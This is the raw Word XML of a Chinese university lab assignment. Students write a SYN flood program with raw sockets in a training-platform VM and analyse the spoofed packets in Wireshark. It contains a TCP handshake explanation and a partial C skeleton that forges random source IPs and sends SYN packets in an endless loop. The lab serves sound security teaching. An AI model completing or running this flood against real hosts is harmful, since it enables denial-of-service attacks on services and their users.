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92C4B" w14:textId="1C990087" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>【实验目的】</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>1、理解TCP三次握手协议，伪造TCP数据包，实施网络攻击；</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2、学习发起SynFlood攻击，并嗅探截获分析；</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3、进一步理解原始套接字编程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6467BC20" w14:textId="34B60DD7" w:rsidR="007C783D" w:rsidRPr="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>【实验环境】</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>云实训平台或本地VMware虚拟机，Linux系统，gcc编译环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEDB958" w14:textId="77777777" w:rsidR="005E708F" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>【实验要求】</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>1、学习Linux下Raw Socket编程，设计实现一个洪泛攻击程序；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DAB595" w14:textId="77777777" w:rsidR="00DA3A27" w:rsidRDefault="005E708F" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C4BC3D" wp14:editId="317643DB">
            <wp:extent cx="4167218" cy="2948009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7218" cy="29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D6E" w14:textId="77777777" w:rsidR="00E876BD" w:rsidRDefault="00DA3A27" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="262B9C5A" wp14:editId="7219FD96">
            <wp:extent cx="3943379" cy="2109803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1CBC" w14:textId="77777777" w:rsidR="00F879AA" w:rsidRDefault="00F879AA" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263249A5" w14:textId="10552B08" w:rsidR="00044BB9" w:rsidRDefault="00E876BD" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C3E2CCF" wp14:editId="2FF5B5A3">
            <wp:extent cx="5274310" cy="13938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755" w14:textId="739BEC71" w:rsidR="008B7F6F" w:rsidRDefault="008B7F6F" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing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CAADCD" wp14:editId="5D7A69F6">
            <wp:extent cx="3986242" cy="2286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6242" cy="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5FB1" w14:textId="77777777" w:rsidR="00F879AA" w:rsidRDefault="00044BB9" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59983D7B" wp14:editId="36E26759">
            <wp:extent cx="5274310" cy="1343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D40E" w14:textId="77777777" w:rsidR="00F94D23" w:rsidRDefault="00F879AA" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DF1AB6D" wp14:editId="4B4A5149">
            <wp:extent cx="4010054" cy="6905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786A" w14:textId="32075A55" w:rsidR="007C783D" w:rsidRPr="007C783D" w:rsidRDefault="00F94D23" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F214186" wp14:editId="6571F17E">
            <wp:extent cx="5274310" cy="1360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83D">
        <w:br/>
        <w:t>2、利用Sniffer Pro或Wireshark嗅探工具，对洪泛攻击发出的数据包进行截获分析；</w:t>
      </w:r>
      <w:r w:rsidR="007C783D">
        <w:br/>
        <w:t>[选做]3、利用实验六编写的网络嗅探器程序捕获分析SynFlood攻击程序生成的伪造数据包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E442B" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>【实验步骤】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E59C7F0" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>1、进入蓝盾云实训平台——【网络安全协议】——原始套接字；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15582360" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>2、点击进入debian系统，编写SynFlood.c原始套接字攻击程序，以debian为攻击者，以Windows为靶机，进行攻击；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151CB2D" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>3、在Windows靶机上启动Sniffer Pro或Wireshark进行抓包分析，分析收到的洪泛报文是否正确；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC6B1E" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>[选做]4、在debian平台上运行实验6编写的Sniffer程序，使用SynFlood攻击自身IP并使用Sniffer抓包分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD63BC9" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC0585A" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>【实验内容】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040A2F5E" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>1、设计实现SynFlood攻击程序，将攻击程序中的源端口设置为你的学号的后5位，将代码、运行结果截图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C7E53E" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>可选实现方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B248ED" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>[方式1]：完全自己编写，参考附录材料，并补充一些语句、头文件等等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A477ED" w14:textId="03412447" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>[方式2]：参照源码修改，debian平台内置了程序代码；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046AD253" w14:textId="5620C8EC" w:rsidR="00D571CC" w:rsidRDefault="005A6D61" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing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0BD864" wp14:editId="70AD8418">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>19050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1676400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1052513" cy="128588"/>
                <wp:effectExtent l="0" t="0" r="14605" b="241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513" cy="12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C7596D" id="矩形 12" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:1.5pt;margin-top:132pt;width:82.9pt;height:1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" filled="f" strokecolor="red" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00EA1551">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="043C3A4B" wp14:editId="3EBA92E4">
            <wp:extent cx="5274310" cy="35960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476">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E805709" wp14:editId="0C97B769">
            <wp:extent cx="4943511" cy="2209816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F035" w14:textId="191AFE7D" w:rsidR="008549BC" w:rsidRDefault="008549BC" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing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A1BEA1" wp14:editId="12ADAF25">
            <wp:extent cx="5274310" cy="38874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55FD" w14:textId="10E5CB23" w:rsidR="009D0E79" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2、在Windows靶机上启动嗅探工具（Sniffer Pro、Wireshark均可），截获并分析所捕获的攻击包，将结果截图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30848CC2" w14:textId="690E82AC" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>a). 在无攻击情况下，截获分析网络数据包并截图，找出一次完整的TCP三次握手和四次挥手过程，截图；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB7E363" w14:textId="22ADB90E" w:rsidR="00092039" w:rsidRDefault="00092039" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CED40E4" wp14:editId="255649BA">
            <wp:extent cx="5274310" cy="15481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0335" w14:textId="00BD2A74" w:rsidR="00C55C92" w:rsidRDefault="00C55C92" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74124508" wp14:editId="41DC5836">
            <wp:extent cx="5274310" cy="5486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C35E" w14:textId="4CF79D3D" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>b). 使用SynFlood程序攻击Windows靶机，截图嗅探工具的数据包捕获情况，分析任意一次你所发出的SynFlood数据包，截图数据包的协议标志位，以及分析结果是否正确；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257FBE9" w14:textId="0DB1490F" w:rsidR="00703851" w:rsidRDefault="00703851" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FB3B4EE" wp14:editId="1735D4BD">
            <wp:extent cx="5274310" cy="38874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E1B" w14:textId="654D53E5" w:rsidR="00D03A1C" w:rsidRDefault="00D03A1C" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6298746C" wp14:editId="4F12A599">
            <wp:extent cx="5274310" cy="39109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E5A3" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>[选做]4、在Debian上运行实验六的Sniffer程序，截获分析所捕获的攻击包数据，结果截图。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787554AF" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483EBFCD" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>——————————————————————————————</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A50E9A0" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>【附录：SynFlood攻击原始套接字实验原理】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F63E8" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3848B1BE" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>TCP协议提供面向连接、高可靠性的通信服务。在利用TCP进行通信之前，通信双方需要建立一条TCP连接，TCP使用SYN(同步段)报文来描述用于创建一个连接的三次握手中的消息 。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>三次握手协议步骤：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>第一次握手：建立连接时，客户端发送请求包SYN(SEQ=k)到服务器，并进入SYN—SEND状态，等待服务器确认，请求标志syn=1；</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>第二次握手：服务器收到请求包，必须确认客户的请求包(ACK=k+1)，同时自己也发送一个应答包(SEQ=q)，即SYN十ACK包，此时服务器进入SYN．RECV状态，应答标志ack=1；</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>第三次握手：客户端收到服务器的SYN+ACK包，向服务器发送确认包ACI((SEQ：q+1)，此包发送完毕，客户端和服务器进入ESTABLISHED状态，完成三次握手。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>创建一个TCP连接的三次握手过程中，要求连接双方都要产生一个随机的32 bit的初始序列号。如果在计算机重新启动之后，一个应用尝试建立一个新的TCP连接，TCP就选择一个新的随机数，可以保证新的连接不受原来连接的重复或延迟包的影响。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>泛洪攻击利用的是TCP的三次握手机制，攻击端利用伪造的IP地址向被攻击端发出请求，而被攻击端发出的响应报文将永远发送不到目的地，那么被攻击端在等待关闭这个连接的过程中消耗了资源，如果有成千上万的这种连接，主机资源将被耗尽，从而达到攻击的目的。</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>在服务器与客户端之间传输数据时，先建立tcp连接是必须的，在传送tcp数据时，必须建立一个虚电路，即tcp连接。SYN 洪泛攻击通过故意不完成三次握手过程，造成连接一方的资源耗尽。攻击者向靶机发送一个SYN报文后就拒接返回报文，这样靶机在发出SYN +ACK 应答报文后是无法收到客户端的ACK报文的，这样第三次握手就无法完成，这种情况下，靶机即被攻击的服务器端一般会重试再发送SYN+ACK给客户端，并等待一段时间后丢弃这个未完成的连接，这段时间称为SYN Timeout，一般来说这个时间大约为1分钟。通常，一个用户出现这种异常的情况，并不会造成很大的问题，但是对于攻击者来说，一定会大量的模拟这种情况，这样就有可能造成靶机即服务器不能正常提供服务，最后有可能导致服务器崩溃。因为服务器为了维护大量的半连接列表要消耗非常多的资源，例如计算机需要消耗CPU时间对半连接列表中的ip进行SYN+ACK的重试，还要分配内存存储的协议信息，TCP状态信息，IP地址信息，端口号，IP头，定时器信息，顺序号，指向目的主机的路由信息等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D7A69B" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>【实验内容】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F6752" w14:textId="77777777" w:rsidR="007C783D" w:rsidRDefault="007C783D" w:rsidP="007C783D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.编写SynFlood程序，并编译、运行，使得该程序可以针对自身IP的某目标端口，进行随机源IP地址、随机源端口的TCP SYN攻击，并使用Sniffer程序输出SynFlood发送的数据包的嗅探结果，请将代码粘贴于此，将Sniffer输出的结果截图。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附件：泛洪攻击程序实例部分核心代码，缺少部分请自行编写补齐：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>…省略部分…</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>void send_tcp(int sockfd, struct sockaddr_in *addr);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>unsigned short check_sum(unsigned short *addr, int len);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    …省略部分…</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>/****使用IPPRPTP_TCP创建一个TCP的原始套接字****/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if(sockfd&lt;0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>  { fprintf(stderr,”Socket Error: %sna”,strerror(errno)); exit(1); }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&amp;on,sizeof(on)); /*设置自填数据包*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> setuid(getpid());//只有超级用户才可以使用原始套接</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> send_tcp(sockfd,&amp;addr);//发动拒绝服务炸弹攻击</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    /*******发送炸弹的实现*******/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    void send_tcp(int sockfd, struct sockaddr_in *addr)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    …省略部分…</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      struct ip *ip;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      struct tcphdr *tcp;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      int head_len;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      head_len=sizeof(struct ip)+sizeof(struct tcphdr);/*伪数据包实际没有任何内容*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    …省略部分…</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>    /*******填充IP数据包的头部*******/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      ip=(struct ip *)buffer;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      ip-&gt;ip_v=IPVERSION;/*版本一般为4*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>…省略部分…</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      ip-&gt;ip_p=IPPROTO_TCP;/*说明包的类型为TCP包*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      ip-&gt;ip_sun=0;/*校验和由系统完成*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      ip-&gt;ip_dst=addr-&gt;sin_addr;/*设置攻击对象*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      tcp=(struct tcphdr *)(buffer +sizeof(struct ip));/*开始填写TCP数据包*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      tcp-&gt;source=htons(LOCALPORT);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>      …省略部分…</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      tcp-&gt;seq=random();</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      …省略部分…</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      tcp-&gt;syn=1;/*建立连接*/</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      tcp-&gt;check=0;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>      while(1)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>         ip-&gt;ip_src.s_addr=random();//设置随机伪地址</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>         tcp-&gt;check=check_sum((unsigned short *)tcp,sizeof(struct tcphdr));//该语句可省略</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>         sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t> }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>…省略部分…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE5320" w14:textId="77777777" w:rsidR="00947CC1" w:rsidRPr="007C783D" w:rsidRDefault="00D03A1C"/>
    <w:sectPr w:rsidR="00947CC1" w:rsidRPr="007C78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A25"/>
    <w:rsid w:val="00044BB9"/>
    <w:rsid w:val="00092039"/>
    <w:rsid w:val="00142BB6"/>
    <w:rsid w:val="00245D16"/>
    <w:rsid w:val="00362EF9"/>
    <w:rsid w:val="003A4476"/>
    <w:rsid w:val="00577A25"/>
    <w:rsid w:val="005A6D61"/>
    <w:rsid w:val="005E708F"/>
    <w:rsid w:val="00703851"/>
    <w:rsid w:val="007C783D"/>
    <w:rsid w:val="008549BC"/>
    <w:rsid w:val="008B7F6F"/>
    <w:rsid w:val="009D0E79"/>
    <w:rsid w:val="00C55C92"/>
    <w:rsid w:val="00D03A1C"/>
    <w:rsid w:val="00D571CC"/>
    <w:rsid w:val="00DA3A27"/>
    <w:rsid w:val="00E876BD"/>
    <w:rsid w:val="00EA1551"/>
    <w:rsid w:val="00EB418B"/>
    <w:rsid w:val="00F879AA"/>
    <w:rsid w:val="00F9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22381"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ADF80F86-18AF-4197-9F04-DA4DCF894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C78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2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532</Words>
  <Characters>3035</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>25</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop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世琛</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>张 世琛</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-23T06:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-23T08:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>